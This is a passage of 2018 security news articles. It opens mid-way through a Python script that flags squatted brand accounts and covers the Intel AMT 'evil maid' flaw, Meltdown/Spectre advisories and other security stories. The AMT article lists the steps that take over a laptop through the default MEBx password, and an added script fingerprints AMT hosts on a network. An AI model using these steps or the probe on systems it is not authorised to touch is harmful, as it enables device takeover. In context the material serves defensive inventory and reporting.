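        for k in QWERTY_NEIGHBOURS.get(b[i], ""):
            variants.add(b[:i] + k + b[i + 1:])                 # adjacent-key substitution
        if b[i] in HOMOGLYPHS:
            variants.add(b[:i] + HOMOGLYPHS[b[i]] + b[i + 1:])  # homoglyph substitution
    for i in range(len(b) - 1):
        variants.add(b[:i] + b[i + 1] + b[i] + b[i + 2:])       # adjacent transposition
    variants.discard(b)
    return variants


def cybersquat_variants(brand):
    """Generate brand+affix combinations with the separators platforms commonly allow."""
    b = brand.lower()
    variants = set()
    for affix, sep in itertools.product(AFFIXES, ("", "_", "-", ".")):
        variants.add(f"{b}{sep}{affix}")
        variants.add(f"{affix}{sep}{b}")
    return variants


def find_squatted_accounts(brand, account_names, owned=()):
    """Return account names that are the brand itself or a squat of it, minus accounts the brand owns."""
    candidates = typosquat_variants(brand) | cybersquat_variants(brand) | {brand.lower()}
    owned_set = {o.lower() for o in owned}
    return sorted(n for n in account_names if n.lower() in candidates and n.lower() not in owned_set)


# Constructed sample of names as a hypothetical platform search might return them.
SAMPLE_ACCOUNTS = ["examplecorp", "examp1ecorp", "examplecorp_support", "exmaplecorp",
                   "examplecrop", "unrelated-user", "examplecorpp", "officialexamplecorp"]

if __name__ == "__main__":
    for hit in find_squatted_accounts("examplecorp", SAMPLE_ACCOUNTS, owned=["examplecorp"]):
        print("possible squat:", hit)
```

The exact brand name is deliberately kept as a candidate: on a platform where the organisation has not registered its own name, someone else holding it is the most damaging squat of all, which is why the `owned` list is the only thing that suppresses it. As the article notes, everything this returns still needs a human look before a takedown request is sent.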

High-Tech Bridge told SecurityWeek that new social networks will be added in the upcoming period. The detection algorithms and the database storing information on malicious domains are continuously improved – the company says there is an improvement of roughly 10 percent every month. The results displayed for each tested domain are updated every 24 hours.

The Trademark Monitoring Radar service is fully automated, which can result in false positives, and the security firm pointed out that it is virtually impossible to automatically assess the impact of each account. Each potentially problematic account is therefore displayed as a link, making it easier for users to verify it manually.

“We prefer to give more than less,” explained Ilia Kolochenko, CEO and founder of High-Tech Bridge. “For some companies, even the same user name can pose a potential problem. We saw when relatively innocent accounts were used in sophisticated credit card fraud.”

It can be useful for organizations to identify squatted or fraudulent accounts on social media websites as they can be abused by malicious hackers in combination with social engineering for spear phishing attacks. As for code repositories, fake accounts can be leveraged for delivering malware, Kolochenko said.

Once fraudulent accounts or domains have been identified, the targeted organization can ask the service provider to take them down. While the process is often simple for major brands, it can be more difficult for smaller companies. “It can take longer or even require an intervention from a law firm,” Kolochenko explained.


Simple Attack Allows Full Remote Access to Most Corporate Laptops
17.1.2018 securityweek Attack

Remote Attack Leverages Flaw in Intel AMT Technology

Attack is Simple to Exploit, Has Incredible Destructive Potential

Researchers have discovered a flaw in Intel's Active Management Technology (AMT) implementation that can be abused with less than a minute of physical access to the device.

An Evil Maid attack could ultimately give an adversary full remote access to a corporate network without having to write a single line of code.

The flaw was discovered by F-Secure senior security consultant Harry Sintonen, and disclosed today. It is unrelated to the "Apocalyptic AMT firmware vulnerability" (CVE-2017-5689) disclosed in May 2017, or to the current Meltdown and Spectre issues.

The new flaw is surprising in its simplicity. "It is almost deceptively simple to exploit, but it has incredible destructive potential," explains Sintonen. "In practice, it can give an attacker complete control over an individual's work laptop, despite even the most extensive security measures."

The problem is that setting a BIOS password (standard procedure on corporate laptops) does not usually protect the AMT configuration menu, the Intel Management Engine BIOS Extension (MEBx), which has its own separate password. Unless that password has been changed, and usually it has not, the default password 'admin' gives the attacker access to AMT.

AMT is an out-of-band hardware-based remote management tool. It is chip-level and not dependent on software or an operating system. It requires only power and a connection. Its purpose is to give IT staff remote access to, and therefore control over, corporate devices; and is particularly useful for laptops used away from the office. It is found on computers with Intel vPro-enabled processors, and workstation platforms based on specific Intel Xeon processors -- in short, the vast majority of company endpoints.

If attackers have physical access to such a device, they need only boot it, press CTRL-P during startup, and log in to MEBx with the default password 'admin'. "By changing the default password, enabling remote access and setting AMT's user opt-in to "None", a quick-fingered cyber criminal has effectively compromised the machine," writes F-Secure.

The device itself might be considered secure, with a strong BIOS password, TPM PIN, BitLocker and login credentials -- but all of these can be bypassed remotely if the attackers are able to insert themselves onto the same network segment as the victim. "In certain cases," warns F-Secure, "the assailant can also program AMT to connect to their own server, which negates the necessity of being in the same network segment as the victim."

Once such an attack has succeeded, the target device is fully compromised and the attacker has remote ability to read and modify all data and applications available to the authorized user.

Although physical access is required for the attack, the speed with which it can be accomplished makes the Evil Maid attack (so-called because such attacks can be exploited in a hotel room if a device is left unattended for a brief period of time) a viable threat.

Sintonen describes a potential scenario. "Attackers have identified and located a target they wish to exploit. They approach the target in a public place -- an airport, a cafe or a hotel lobby -- and engage in an 'evil maid' scenario. Essentially, one attacker distracts the mark, while the other briefly gains access to his or her laptop. The attack doesn't require a lot of time -- the whole operation can take well under a minute to complete," Sintonen says.

Preventing such Evil Maid attacks is simple in principle, but complex in practice, requiring granular provisioning. AMT should be disabled for all devices that are unlikely to require it. Where it is required, each device needs to be provisioned with a strong password. This needs to be done for both new and currently deployed devices.

"It is recommended to query the amount of affected devices remotely, and narrow the list of assets needing attention down to a more manageable number. For computers connected to a Windows domain, provisioning can be done with Microsoft System Center Configuration Manager," suggests F-Secure. If any device is found to have an unknown password (in many cases this will be anything other than 'admin'), that device should be considered suspect and appropriate incident response procedures should be initiated.
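F-Secure's advice to query the number of affected devices remotely can be started before any SCCM provisioning work: a provisioned AMT stack listens on TCP 16992 (HTTP) and 16993 (HTTPS) independently of the host operating system, and its web interface names itself in the `Server` response header. The Python block below is an added example, not F-Secure's tooling: it classifies an HTTP response as coming from AMT or not, pulls out the advertised firmware version, and provides a small probe for a list of hosts on the plain-HTTP port. The response text embedded in the block is a constructed sample, and no host is contacted unless `probe_host` is called.

```python
import re
import socket

# AMT's web server identifies itself like this; the trailing version is optional.
SERVER_RE = re.compile(r"Intel\(R\)\s+Active Management Technology\s*([\d.]+)?", re.IGNORECASE)

# Constructed sample of a reply from a provisioned AMT host (not a real capture).
SAMPLE_AMT_RESPONSE = (
    "HTTP/1.1 401 Unauthorized\r\n"
    "Server: Intel(R) Active Management Technology 11.8.50.3425\r\n"
    "WWW-Authenticate: Digest realm=\"Digest:0123456789ABCDEF\", nonce=\"a1b2c3d4\", "
    "stale=\"false\", qop=\"auth\"\r\n"
    "Content-Type: text/html\r\n"
    "Content-Length: 0\r\n\r\n"
)
# Constructed sample of an ordinary web server answering on the same port.
SAMPLE_OTHER_RESPONSE = "HTTP/1.1 200 OK\r\nServer: nginx/1.14.0\r\nContent-Length: 0\r\n\r\n"


def parse_headers(response_text):
    """Return a lowercase-keyed dict of HTTP headers from raw response text."""
    head = response_text.split("\r\n\r\n", 1)[0]
    headers = {}
    for line in head.split("\r\n")[1:]:        # skip the status line
        name, sep, value = line.partition(":")
        if sep:
            headers[name.strip().lower()] = value.strip()
    return headers


def classify_amt(response_text):
    """Return {'amt': bool, 'version': str or None, 'digest_auth': bool} for one response."""
    headers = parse_headers(response_text)
    m = SERVER_RE.search(headers.get("server", ""))
    return {
        "amt": m is not None,
        "version": m.group(1) if m else None,
        "digest_auth": headers.get("www-authenticate", "").lower().startswith("digest"),
    }


def probe_host(host, port=16992, timeout=3.0):
    """Send a minimal GET to the AMT HTTP port and classify the reply; None if unreachable.

    Port 16993 is TLS and would need an ssl-wrapped socket; it is not probed here.
    """
    request = f"GET /index.htm HTTP/1.1\r\nHost: {host}\r\nConnection: close\r\n\r\n"
    try:
        with socket.create_connection((host, port), timeout=timeout) as s:
            s.sendall(request.encode())
            data = b""
            while len(data) < 4096:
                chunk = s.recv(1024)
                if not chunk:
                    break
                data += chunk
    except OSError:
        return None
    return classify_amt(data.decode("latin-1", errors="replace"))


def amt_hosts(results):
    """Filter a {host: classification} map down to the hosts that answered as AMT."""
    return sorted(h for h, r in results.items() if r and r["amt"])


if __name__ == "__main__":
    print(classify_amt(SAMPLE_AMT_RESPONSE))
    # Example sweep (replace the addresses with the range you are inventorying):
    # results = {h: probe_host(h) for h in ["10.0.0.10", "10.0.0.11"]}
    # print("AMT hosts to provision:", amt_hosts(results))
```

A host that answers on 16992 has AMT provisioned and belongs on the list of devices whose MEBx password must be verified. A host that does not answer is not thereby cleared: an unprovisioned machine still has MEBx reachable at boot with the default password, which is exactly the state the attack exploits, and that state is only visible at the console or through the management stack.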

Sintonen found the issue in July 2017. However, he also notes that Google's Parth Shukla mentioned it in an October 2017 presentation titled 'Intel AMT: Using & Abusing the Ghost in the Machine' delivered at Hack.lu 2017. Since the issue is already public knowledge, Sintonen recommends that organizations tackle the problem as soon as possible.


ICS Vendors Assessing Impact of Meltdown, Spectre Flaws
17.1.2018 securityweek Vulnerability

Organizations that provide solutions for critical infrastructure sectors, including medical device and industrial control systems (ICS) manufacturers, have started assessing the impact of the recently disclosed Meltdown and Spectre exploits on their products.

The Meltdown and Spectre attacks allow malicious applications to bypass memory isolation mechanisms and access potentially sensitive data. Billions of devices using Intel, AMD, ARM, Qualcomm and IBM processors are affected.

While affected companies have been working on releasing both software and firmware mitigations, the changes made to a system can introduce significant performance penalties, and in some cases users reported that the patches had broken their operating system and various applications.

Considering that in the case of industrial systems availability and integrity are of the utmost importance, vendors have warned customers that extensive testing should be conducted before any patches are applied in an effort to avoid disruptions.

Several vendors have published advisories to inform customers that they are assessing the impact of the Spectre and Meltdown exploits. The list includes Siemens, Schneider Electric, ABB, Rockwell Automation, and medical technology company Becton Dickinson (BD). ICS-CERT has also published an advisory directing users to the advisories of some vendors.

Siemens

In an advisory published on Thursday, Siemens told customers that it’s analyzing the impact of the vulnerabilities and available mitigations. Several of the company’s products may be affected as they are typically installed on systems powered by one of the affected processors.

“Updates for operating systems, processor firmware, and other systems can help to mitigate these vulnerabilities. Siemens is testing the compatibility of the patches released for supported operating systems for several products,” the company said.

“Siemens is aware that some updates can result in compatibility, performance or stability issues on certain products and operating systems. Operating system vendors, such as Microsoft, are still working to address these compatibility issues with their updates. Siemens will therefore continue to evaluate the applicability of those updates,” it added.

Until patches and workarounds can be safely applied, Siemens has advised organizations to ensure that untrusted code cannot be executed on systems running its products, which is a requirement for launching Meltdown and Spectre attacks.

Rockwell Automation

Rockwell Automation has also confirmed that its customers’ environments are potentially impacted by the vulnerabilities.

The company is working with software and hardware partners on addressing the problem in its E1000, E2000 and E3000 Industrial Data Center (IDC) offerings. Its employees are also working on testing the updates made available by Microsoft.

Rockwell Automation has warned organizations that some of the updates released by Microsoft are known to cause anomalies in FactoryTalk-based products, including Studio 5000, FactoryTalk View SE, and RSLinx Classic. Rockwell has been working with Microsoft on resolving the anomalies.

Schneider Electric

Schneider Electric is also monitoring the situation. The company has informed customers that the list of impacted products includes StruxureWare Data Center Expert (DCE), StruxureWare Data Center Operation (DCO), NetBotz Appliances, APC Network Management Cards, PowerChute Network Shutdown, PowerChute Business Edition, PowerChute Personal Edition, and 1ph and 3ph UPS.

“Many of the initial mitigations proposed by hardware and operating system vendors indicate a high level of potential performance impact, Schneider Electric recommends caution if mitigations or patches are applied to critical and/or performance constrained systems,” Schneider Electric said. “If you elect to apply recommended patches or mitigations in advance of further guidance from Schneider Electric, we strongly recommend evaluating the impact of those measures on a Test & Development environment or an offline infrastructure.”

Schneider Electric’s Wonderware warned users that one of Microsoft’s updates causes Wonderware Historian to become unstable.

ABB

Swiss power and automation solutions provider ABB told customers that it has launched an investigation, but all products running on affected processors are potentially impacted.

“The vulnerabilities do not target any ABB products specifically, but potentially affect products that use affected processors in general,” ABB said in an advisory published last week.

Until the company assesses the impact of the attacks on each of its products, it has advised customers to ensure that industrial networks are protected against unauthorized access. Unlike other vendors, ABB has advised customers to install operating system updates without mentioning the potential risks associated with applying unstable patches.

BD

BD pointed out to customers that the vulnerabilities are not exclusive to its products or medical devices in general, and the company believes the risk of attacks is low. BD has provided a list of impacted products.

The company has advised users to apply patches from Microsoft and any firmware updates that may become available. However, the updates from Microsoft should only be applied after they have been tested and approved by BD.

Testing needed before applying patches

While not all ICS vendors mentioned it, any patches and mitigations for the Spectre and Meltdown vulnerabilities should be tested before being deployed to critical systems, particularly since some of them may cause devices to become unstable.

“The changes needed to fix Spectre and Meltdown vulnerabilities more thoroughly are so extensive that costly and extensive testing will be needed before the updates can safely be applied to reliability-critical control systems,” explained Andrew Ginter, VP of Industrial Security at Waterfall Security.

“In the very short term, what every control system owner and operator will be asking is ‘how long can we safely delay this very costly testing process?’ and ‘do I need to drop everything and start testing and applying these fixes yesterday?’,” Ginter added.


AMD Working on Microcode Updates to Mitigate Spectre Attack
12.1.2018 securityweek
Vulnerability

AMD has informed customers that it will soon release processor microcode updates that should mitigate one of the recently disclosed Spectre vulnerabilities, and Microsoft has resumed delivering security updates to devices with AMD CPUs.

Shortly after researchers revealed the Spectre and Meltdown attack methods, which allow malicious actors to bypass memory isolation mechanisms and access sensitive data, AMD announced that the risk of attacks against its products was “near zero.”

The company has now provided additional information on the matter, but maintains that the risk of attacks is low.

According to AMD, its processors are not vulnerable to Meltdown attacks thanks to their architecture. They are, however, vulnerable to Spectre attacks.

Spectre attacks are made possible by two vulnerabilities: CVE-2017-5753 and CVE-2017-5715. The former does impact AMD processors, but the chipmaker is confident that operating system patches are sufficient to mitigate any potential attacks.

Microsoft announced a few days ago that it had suspended the delivery of security updates to devices with AMD processors due to some compatibility issues. AMD said the problem affected some older processors, including Opteron, Athlon and Turion families.

Microsoft said on Thursday that it had resumed the delivery of updates to a majority of AMD devices, except for a “small subset” of older processors. AMD told customers it expects the issue to be corrected for the remaining processors by next week.

As for the second Spectre vulnerability, AMD believes it is difficult to exploit against its products. Nevertheless, the company has been working with operating system vendors to develop patches, and it has also promised to provide optional microcode updates.

The microcode updates should become available for Ryzen and EPYC processors in the next days, and for previous generation products sometime over the coming weeks. The updates will be available from system manufacturers and OS vendors.

AMD claims its GPUs are not impacted by the vulnerabilities. NVIDIA also says its GPUs are immune, but the company has still provided some display driver updates to help mitigate the CPU flaws.

Intel has already released patches, including processor microcode updates, for many of its processors. Linux users can install the microcode updates through the operating system’s built-in mechanism.

The fixes for the Spectre and Meltdown vulnerabilities appear to cause problems on some systems. Ubuntu users complained that their devices failed to boot after installing updates, forcing Canonical to release a new kernel update to address the issue.

Intel has also become aware of reports that systems with Broadwell and Haswell CPUs reboot more often as a result of the patches.

“We are working quickly with these customers to understand, diagnose and address this reboot issue. If this requires a revised firmware update from Intel, we will distribute that update through the normal channels. We are also working directly with data center customers to discuss the issue,” the company stated.


Proposed Legislation Would Create Office of Cybersecurity at FTC
12.1.2018 securityweek Cyber

Two Democratic senators, Elizabeth Warren, D-Mass., and Mark Warner, D-Va, introduced a bill Wednesday that would provide the Federal Trade Commission (FTC) with punitive powers over the credit reporting industry -- primarily Equifax, Credit Union and Experian -- for poor cybersecurity practices.

The bill is in response to the huge Equifax breach disclosed in September, 2017. "Equifax allowed personal data on more than half the adults in the country to get stolen, and its legal liability is so limited that it may end up making money off the breach," said Senator Warren in a Wednesday statement.

If the bill succeeds, it will become the Data Breach Prevention and Compensation Act of 2018. It will create an Office of Cybersecurity at the FTC, "headed", says the bill (PDF), "by a Director, who shall be a career appointee." This Office would be responsible for ensuring that the CRAs conform to the requirements of the legislation, and would have the power to establish new security standards going forwards.

The punitive power of the Act comes in the level of the potential fines, beginning with a base penalty of $100 for each consumer who had one piece of personal identifying information (PII) compromised and another $50 for each additional PII compromised per consumer. On this basis, were the Act already in force, Equifax would be facing a fine of at least $1.5 billion.

Under current law, say the lawmakers, it is difficult for consumers to get compensation when their personal data is stolen. Typical awards range from $1 to $2 per consumer. This bill requires the FTC to use 50% of its penalty to compensate consumers.

The maximum penalty is capped at 50% of the credit agencies' gross revenue from the previous year. This dwarfs even the EU's General Data Protection Regulation (GDPR) maximum fine, set at 4% of global revenue -- but it gets worse: it could increase to 75% of gross revenue where the offending CRA fails to comply with the FTC's data security standards or fails to notify the agency of a breach in a timely manner.

The bill requires CRAs to notify the FTC of a breach within 10 days of the breach -- it doesn't at this stage specify whether that is 10 days from the breach occurring, or 10 days from discovery of the breach. Within 30 days of being so notified, the FTC is then required to "commence a civil action to recover a civil penalty in a district court of the United States against the covered consumer reporting agency that was subject to the covered breach."

While 50% of any recovered money is to compensate the victims of the breach, the remaining 50% is to be used for cybersecurity research and inspections by the FTC's new Office of Cybersecurity.

"In today's information economy, data is an enormous asset. But if companies like Equifax can't properly safeguard the enormous amounts of highly sensitive data they are collecting and centralizing, then they shouldn't be collecting it in the first place," said Sen. Warner. "This bill will ensure that companies like Equifax -- which gather vast amounts of information on American consumers, often without their knowledge -- are taking appropriate steps to secure data that's central to Americans' identity management and access to credit."

How much traction this bill will receive in the Senate remains to be seen, but it reflects the general dismay felt at the size of the Equifax breach -- which could have been prevented if patches had been applied. It is not the first Equifax-related legislative proposal, but it is by far the most punitive. In November 2017, New York State Attorney General Eric T. Schneiderman introduced the Stop Hacks and Improve Electronic Data Security Act (SHIELD Act) to improve security specifically within New York State.

SHIELD fines are capped at $250,000, and the disclosure requirement is vague: "The disclosure shall be made in the most expedient time possible and without unreasonable delay, consistent with the legitimate needs of law enforcement..." Put very simply, both proposals are designed to improve the security of their respective 'covered entities' (CRAs are covered in both bills), but SHIELD seeks to do so in a 'business friendly' manner, while the Data Breach Prevention and Compensation Act of 2018 seeks to do so in a 'consumer friendly' manner.


Bogus Passwords Can Unlock AppStore Preferences in macOS
12.1.2018 securityweek Apple

A security vulnerability impacting macOS High Sierra allows admins to unlock the AppStore Preferences in System Preferences by providing any password.

The issue was found to affect macOS 10.13.2, the latest iteration of the platform, and can be reproduced only if the user is logged in as administrator. For non-admin accounts, the correct credentials are necessary to unlock the preferences pane.

macOS High Sierra 10.13.2 users interested in reproducing the bug should log into their machines as administrators, then navigate to the App Store preferences in System Preferences.

Next, users should click on the padlock icon to lock it if necessary, then click it again. When prompted to enter the login credentials, they can use any password and still unlock the Prefpane.

One thing that should be noted is that the App Store settings pane opens unlocked by default when the user is logged in as admin, and that no sensitive user information can be accessed by triggering the bug.

Eric Holtam notes the security oversight only impacts the App Store preferences and no other system preferences menu can be unlocked in a similar manner. The admin password is still required when attempting to change user and other system preferences.

The issue, however, is not as dangerous as it might look. For starters, the bug can only be triggered if the user is logged in as admin, which clearly minimizes the vulnerability’s impact, given that the admin can unlock the specific settings.

Users affected by the flaw would be those who, although logged in as admins, still keep the App Store preferences locked. In such cases, if the machine was left unattended, anyone with physical access to it could change the respective settings.

Apple, however, is already working on addressing the issue. A patch has been included in the latest beta seed of macOS High Sierra (10.13.3) and will be released to all Mac users in a future software update.

In late November, the tech giant patched a critical authentication bypass vulnerability in macOS High Sierra 10.13.1, where anyone could log in as root by providing any password. The attack, however, was possible only if the root account hadn’t been enabled or a password hadn’t been set for it. Experts later revealed that remote attacks were also possible.


Never too late, Skype supports end-to-end encryption for new Private Conversations feature
12.1.2018 securityaffairs
Social

It’s official, Microsoft’s Skype is rolling out a new feature called Private Conversations, which uses end-to-end encryption.
The latest version of Skype implements end-to-end encryption and introduces support for the Signal protocol, which is the protocol used by WhatsApp, Facebook Messenger, Google Allo, and Signal.

Thanks to the introduction of end-to-end encryption, attackers will not be able to snoop on Skype Private Conversations, which will support text, audio calls, and file transfers.

“We know extra protection is important as you share sensitive information over Skype so we’re excited to announce the preview of end-to-end encrypted Private Conversations, available now for Skype Insiders.” states the announcement published by Microsoft.

“With Private Conversations, you can have end-to-end encrypted Skype audio calls and send text messages or files like images, audio, or videos, using the industry standard Signal Protocol by Open Whisper Systems. The content of these conversations will be hidden in the chat list as well as in notifications to keep the information you share private.”

Currently, Private Conversations are only available in the Insider builds of Skype, which are offered for the desktop version of the app as well as the iOS, Android, Linux, and macOS clients.

Unfortunately, Private Conversations still don’t support video calling, and this is a very big limitation.

Experts have criticized Skype in the past for failing to implement end-to-end encryption, a limitation that gave an advantage to many other instant messaging services such as WhatsApp and Facebook Messenger.

The adoption of the Signal protocol is significant: this is the first time Microsoft has not used a proprietary Skype encryption protocol.

If you want to test the new feature, select “New Private Conversation” from the compose menu or from the recipient’s profile.

“After the recipient accepts your invite, all calls and messages in that conversation will be encrypted end-to-end until you choose to end it.” continues Microsoft. “You can only participate in a private conversation from a single device at a time. You can switch the conversation to any of your devices, but the messages you send and receive will be tied to the device you’re using at the time.”


Security Operations Firm Arctic Wolf Raises $16 Million
11.1.2018 securityweek IT
Arctic Wolf Networks, a Sunnyvale, Calif.-based company that offers outsourced security operations center (SOC) services, announced on Wednesday that it has raised $16 million in new funding.

According to the company, the new injection of cash will help support overall business growth, and fuel sales and marketing, product development and strategic alliance initiatives.

With security operations teams overwhelmed by the sheer volume of vulnerabilities across the enterprise, they are falling behind in efforts to remediate them. According to a mid-2017 report published by EMA, seventy-four per cent of security teams admit they are overwhelmed by the volume of maintenance work required.

This is a problem that Arctic Wolf aims to help with. The company offers a turnkey “SOC-as-a-Service” that includes what the company calls a “Concierge Security Engineer” (CSE), who serves as a single point of contact for a customer and an extension of the customer’s internal security team.

“Security operations centers are an essential element of modern cybersecurity, and every company needs one,” said Brian NeSmith, CEO and co-founder of Arctic Wolf. “We are transforming how companies look at cybersecurity from a product-centric view to one focused on proactive detection and response. The new funding allows us to invest in key areas of the business and maintain our extraordinary growth trajectory.”

The funding round was led by Sonae Investment Management with participation from Lightspeed Venture Partners, Redpoint Ventures and Knollwood Investment Advisory.


Hackers Leak Olympic Committee Emails in Response to Russia Ban
11.1.2018 securityweek Hacking
A group of hackers linked to Russia has leaked several emails apparently exchanged between officials of the International Olympic Committee (IOC) and other individuals involved with the Olympics. The leak comes in response to Russia being banned from the upcoming Pyeongchang 2018 Winter Games in South Korea.

The group, calling itself Fancy Bears and claiming to be a team of hacktivists that “stand for fair play and clean sport,” previously released confidential athlete medical records stolen from the systems of the World Anti-Doping Agency (WADA), and also targeted the International Association of Athletics Federations (IAAF). One of their most recent leaks included emails and medical records related to football (soccer) players who used illegal substances.

The first leaks from Fancy Bears came shortly after Russian athletes were banned from the 2016 Rio Olympics following reports that Russia had been operating a state-sponsored doping program.

While Fancy Bears claim to be hacktivists, researchers have found ties between the group and Fancy Bear, a sophisticated Russian cyber espionage team also known as APT28, Pawn Storm, Sednit, Sofacy, Tsar Team and Strontium.

The latest leak includes emails apparently exchanged between IOC officials and other individuals involved with the Olympics. Some of the messages discuss the recent decision to ban Russia from the upcoming Winter Games based on the findings of the IOC Disciplinary Commission.

“These emails and documents point to the fact that the Europeans and the Anglo-Saxons are fighting for power and cash in the sports world. WADA headquartered in Montreal, Canada supported by the United States Olympic Committee declared the crusade against the IOC on the pretext of defending clean sport,” the hackers said. “However, the genuine intentions of the coalition headed by the Anglo-Saxons are much less noble than a war against doping. It is apparent that the Americans and the Canadians are eager to remove the Europeans from the leadership in the Olympic movement and to achieve political dominance of the English-speaking nations.”

While the hackers claim the emails they leaked prove the accusations, a majority of the messages don’t appear to contain anything critical. Furthermore, Olympics-related organizations whose systems were previously breached by the hackers claimed at the time that some of the leaked files had been doctored.

WADA representatives told Wired that Fancy Bears are looking to “undermine the work of WADA and others,” and claimed that everything they leaked this week is “dated.” WADA officially accused Russia of being behind previous attacks.

It’s unclear how the emails have been obtained by the hackers, but the group has been known to launch phishing attacks involving fake WADA domains. It’s possible that they tricked some of the individuals whose emails have been compromised into handing over their credentials on a phishing site.

Russia has been accused by several experts of disguising some of its cyber campaigns as hacktivism. For instance, a hacker using the moniker Guccifer 2.0 has taken credit for an attack on the U.S. Democratic Party, which may have influenced last year’s presidential election.

Many believe the Fancy Bears attacks are Russia’s response to its athletes being banned. Perhaps unsurprisingly, articles from two major pro-Russia English-language news organizations suggest that the latest leak from Fancy Bears shows that Russia’s exclusion from the Olympics was politically motivated.

Security firm McAfee reported last week that several organizations associated with the Olympics had received emails set up to deliver information-stealing malware, but it’s unclear who is behind the attacks.


Endgame Lands $1 Million Contract From U.S. Navy
11.1.2018 securityweek IT
Endgame, an Arlington, VA-based supplier of advanced endpoint protection software, has been awarded a $1 million contract by the U.S. Fleet Cyber Command/U.S. Tenth Fleet. The purpose of the contract is to protect more than 500,000 computers and ships' hull, mechanical and electrical systems, weapons and navigation systems, aviation systems, and the technology controlling physical devices on bases and facilities.

"Endgame is honored to enter this partnership with the U.S. Navy," said Nate Fick, Endgame CEO and U.S. military combat veteran. "The Navy is widely known as being on the cutting-edge of cybersecurity defenses, and we were happy to exceed their protection requirements during this competitive process. Safeguarding the most targeted organizations across the Department of Defense is an important part of our mission, and we look forward to continuing it with the Navy."

Fleet Cyber Command is the central cyber authority for the entire U.S. Navy, serving (in its own words), "to direct Navy cyberspace operations globally to deter and defeat aggression and to ensure freedom of action to achieve military objectives in and through cyberspace."

Specifically, the contract is for the acquisition of the Endgame Hunt Team Platform with 10,000 sensors, plus maintenance and support.

Endgame credits the contract to its existing history in protecting both federal government and the U.S. military, and its ability to protect against targeted attack techniques and technologies outlined in the MITRE ATT&CK Matrix. In 2016 it was awarded an $18.8 million contract by the U.S. Air Force.

The Navy's contract justification and approval document is more specific: "Delivered as a single agent, replacing the functions of AV, NGAV, IR, EDR, and exploit prevention agents, Endgame stops all targeted attacks and their components." It scans for vulnerabilities, compares against current STIG checklists, and conducts "if-then scenarios with secondary and tertiary effects (also known as a blast radius)..."

The STIG checklist is a NIST Windows 10 Security Technical Implementation Guide designed to improve the security of Department of Defense information systems. Endgame automatically maps the network against the STIG checklist to evaluate the network's security posture.

While stressing that FLTCYBER will continue to monitor the evolution of EDR, EPP and Next Gen AV technologies that could compete with Endgame in the future, it found that no other single technology currently provides all of its requirements. While combinations of other products could provide much of its required functionality, some requirements could still only be found in Endgame.

Of particular note is Endgame's ability to calculate the "blast radius" on a compromised box. Applied to cybersecurity, the blast radius is the potential effect on the overall network from a compromise. Network segmentation can, for example, limit the blast radius. Endgame's ability to apply 'what-if' scenarios can help security teams determine whether their network configuration is able to contain a potential compromise.

"No other product has been found by the FLTCYBER team at this time that can perform the blast radius function of Endgame," the Navy explained. "This has been identified as a key requirement by FLTCYBER."

Endgame was founded in 2008 by Chris Rouland and other executives who previously worked with the CIA and Internet Security Systems. It originally discovered and sold 0-day vulnerabilities, but shifted away from this around 2014. Under Fick's leadership it has grown its commercial offering using a $23 million Series B funding round in March 2013 followed by a $30 million Series C round in November 2014.


Security Flaws Found in Majority of SCADA Mobile Apps
11.1.2018 securityweek Mobil
Researchers from IOActive and Embedi have conducted an analysis of SCADA mobile applications from 34 vendors and found vulnerabilities in a vast majority of them, including flaws that can be exploited to influence industrial processes.

Two years ago, researchers Alexander Bolshev and Ivan Yushkevich analyzed 20 mobile apps designed to work with industrial control systems (ICS) software and hardware. At the time, they had found roughly 50 security issues – at least one in each application.

Bolshev, who now works for IOActive, and Yushkevich, currently an employee of Embedi, have once again decided to analyze mobile applications used for supervisory control and data acquisition (SCADA) systems in an effort to determine how the landscape has evolved now that the Industrial Internet of Things (IIoT) has become more prevalent.

This time, the experts randomly selected SCADA applications offered on the Google Play Store by 34 vendors – in most cases different from the ones tested back in 2015. The analysis focused on the client apps and backend systems, and it targeted both local and remote applications.

Local applications are typically installed on the tablets used by engineers and they connect directly to industrial devices via Bluetooth, Wi-Fi or a serial connection. Since these programs can be used to control devices such as PLCs, RTUs and industrial gateways, they are typically only used within the plant perimeter, which is considered safe. Remote applications, on the other hand, allow engineers to connect to ICS via the Internet and private cell networks. While in most cases they are only designed for monitoring processes, some of them do allow users to control processes.

Bolshev and Yushkevich set out to find vulnerabilities described in the 2016 OWASP Mobile Top 10 list. These flaws can allow attackers with local or remote access to a device – and ones in a man-in-the-middle (MitM) position – to directly or indirectly influence an industrial process, or trick an operator into performing a harmful action.

Apps from both independent developers and major vendors were tested, which led to the discovery of 147 vulnerabilities in clients and their backend systems.

Researchers found that all but two of the applications failed to implement protections against code tampering. The two apps that had such a mechanism only implemented a basic root detection feature. It is easier for malicious hackers to exploit vulnerabilities on rooted Android devices and some malware families are designed to root smartphones and tablets.

More than half of the tested applications also lacked secure authorization mechanisms – only 20 percent of the local apps implemented an authorization system correctly. The most common problems are the lack of password protection and the presence of a “remember password” feature, which defeats the purpose of setting password protection.

The experts also found that more than half of the apps lacked code obfuscation and other mechanisms designed to prevent reverse engineering. Allowing attackers to reverse engineer an application makes it easier for them to find and exploit vulnerabilities.

Nearly half of the tested apps also failed to store data securely. Data is often stored on the SD card or on a virtual partition, and it’s not protected with access control lists (ACLs) or other permission mechanisms.

Unsurprisingly, more than one-third of the analyzed applications failed to secure communications, including via poor handshakes, incorrect SSL versions, and cleartext data transmission. Researchers noted that their tests did not cover applications using Modbus and other ICS protocols, which are insecure by design.

As for backend issues, researchers discovered various types of vulnerabilities, including SQL injection, memory corruption, DoS, and information leakage flaws.

Back in 2015, Bolshev and Yushkevich predicted that the problems they had found would disappear in the future as a result of the rapidly developing nature of mobile software and the growth of IoT. However, their predictions have not proved to be correct, with the latest tests showing that more than 20 percent of the discovered issues allow malicious actors to misinform operators and influence industrial processes.


Highly Targeted Attacks Hit North Korean Defectors
11.1.2018 securityweek BigBrothers
A recent set of attacks aimed at North Korean defectors and journalists were associated with a highly targeted campaign conducted by an actor that does not appear to be related to any known cybercrime groups, McAfee says.

The attacks used a range of vectors to infect victims with malware, including email, the KakaoTalk chat application (which is popular in South Korea), and social network services such as Facebook. Some of the attacks also employed Google-shortened URLs to spread malware.

McAfee’s research into the incident revealed the use of two versions of the dropper malware, namely applications called “Pray for North Korea” and “BloodAssistant.” Most of the clicks leading to infection originated from South Korea in both cases, McAfee's security researchers discovered.

The most frequently observed browser and operating system combination for the clicks was Chrome and Windows, with Android coming in second, McAfee notes in a technical report. Furthermore, the investigation revealed that Facebook was used in 12% of infections to send a malicious link to the targets.

